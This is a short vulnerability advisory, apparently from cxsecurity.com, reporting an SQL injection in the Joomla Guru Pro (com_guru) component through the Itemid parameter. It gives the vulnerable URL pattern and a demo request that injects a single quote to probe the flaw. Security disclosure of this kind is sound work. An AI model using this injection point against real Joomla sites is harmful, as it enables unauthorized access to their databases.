Joomla Guru Pro SQL Injection

2016.07.15
Credit: s0nk3y
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Joomla Guru Pro (com_guru) Component - SQL Injection # Exploit Author: s0nk3y # Date: 14/07/2016 # Vendor Homepage: https://www.ijoomla.com # Software Link: https://www.ijoomla.com/component/digistore/products/47-joomla-add-ons/119-guru-pro/189?Itemid=189 # Category: webapps # Version: All # Tested on: Ubuntu 16.04 1. Description Turn your knowledge into dollars! Sell Your Courses Today! Guru, allows you to create online courses easily! We believe that everyone is an expert in something. If you know something that others don't, there is no better time to profit from it. You can create a course about your topic and start generating income. 2. Proof of Concept Itemid Parameter Vulnerable To SQL Injection com_guru&view=gurupcategs&layout=view&Itemid=[SQL Injection]&lang=en Demo : http://server/index.php?option=com_guru&view=gurupcategs&layout=view&Itemid=123%27&lang=en


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top